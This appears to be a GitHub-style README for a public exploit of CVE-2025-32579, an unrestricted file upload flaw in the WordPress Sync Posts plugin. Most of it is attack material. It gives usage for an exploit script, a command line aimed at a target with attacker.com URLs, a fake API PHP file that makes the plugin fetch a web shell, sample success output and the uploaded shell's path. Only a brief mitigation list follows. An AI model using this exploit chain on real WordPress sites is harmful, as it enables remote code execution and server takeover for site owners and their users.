
# ⚠️ CVE-2025-32579 - Critical RCE via Sync Posts Plugin (WordPress)


> 📦 Affects: Sync Posts <= 1.0  
> 🧨 CVSS Score: **9.9 CRITICAL**  
> 📁 CVSS Vector: `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H`

---

## 🧠 Vulnerability Overview

The **Sync Posts** WordPress plugin by SoftClever Limited is vulnerable to an **Unrestricted File Upload** vulnerability that allows **authenticated attackers** to upload and execute **arbitrary PHP files** (such as web shells) on the server.

### 🔓 Root Cause:
- The plugin accepts a `website_url` which returns JSON posts.
- It **blindly fetches images** from the post contents without validation.
- No file type, mime-type, or path restriction is applied.
- All images (even PHP files) are downloaded and stored inside `wp-content/uploads`.

---

## 🚨 Why It’s Dangerous

- ✅ **Remote Code Execution (RCE)**
- ✅ Uploads web shells directly to server
- ✅ Requires **minimal privileges** (Authenticated user only)


---

## ⚙️ Script Description (Exploit)

The exploit script automates the full chain:

1. 📥 **Logs into WordPress** using provided credentials
2. 🧠 **Generates fake API PHP** returning JSON post with a shell as `<img src='...'>`
3. 📡 **Sends malicious `website_url`** to `admin-ajax.php?action=sync_posts`
4. 💣 Forces the plugin to fetch and save the shell in `/uploads/`
5. ✅ **No need for Referer** or nonce — session cookie is enough

---
```bash
usage: CVE-2025-32579.py [-h] -u URL -un USERNAME -p PASSWORD -ws WEBSITE -shell WEBSHELL

Exploit For CVE-2025-32579 Sync Posts # By: Nxploited ( Khaled Alenazi )

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g., http://target.com/wordpress)
  -un, --username USERNAME
                        Username to login
  -p, --password PASSWORD
                        Password to login
  -ws, --website WEBSITE
                        URL to fake API (e.g., http://attacker.com/Khaled_alenazi.php)
  -shell, --webshell WEBSHELL
                        Web shell URL used inside the fake API (can be a test image)
                                                                                       

```
## 💻 Usage Instructions

### 📌 Command Format:

```bash
python3 CVE-2025-32579.py -u http://target/wordpress -un admin -p pass123 -ws http://attacker.com/Khaled_alenazi.php -shell http://attacker.com/shell.php
```

### ⚙️ Arguments:

| Flag | Description |
|------|-------------|
| `-u, --url`         | Target WordPress URL |
| `-un, --username`   | WordPress username (admin) |
| `-p, --password`    | WordPress password |
| `-ws, --website`    | URL to malicious PHP file that returns fake post JSON |
| `-shell, --webshell`| The actual shell file to inject via `<img src=...>` |

You can also use a dummy image instead of a real shell for testing:
```bash
--webshell https://via.placeholder.com/1x1.jpg
```

---

## 🧪 Example Fake API Output

This is the response returned by `Khaled_alenazi.php`:

```php
<?php
header('Content-Type: application/json');
echo json_encode([
  [
    "id" => 1,
    "title" => ["rendered" => "Nxploited"],
    "content" => [
      "rendered" => "<img src='http://attacker.com/shell.php'>"
    ]
  ]
]);
?>
```

### ✅ Successful Exploit:

```
[*] Attempting login...
[+] Logged in successfully.
[+] Generated fake API PHP file: Khaled_alenazi.php
[+] Sending exploit request to: http://target.com/wordpress
[+] Request sent successfully.
{
  "success": true,
  "data": {
    "message": "Posts imported successfully",
    ...
  }
}
```
---




## 🔥 After successful exploitation:
- Shell Path and Name: `shell.php`
- target.com/`wp-content/uploads/2025/04/shell.php`


## 🛠️ Fix / Mitigation

- Restrict `website_url` access to internal domains or whitelisted hosts
- Validate image extensions & content types
- Avoid parsing third-party JSON without sanitization

---

## 🧷 Reference

> CVE: [CVE-2025-32579](https://nvd.nist.gov/vuln/detail/CVE-2025-32579)    
> Exploit By Nxploited (Khaled Alenazi)

---
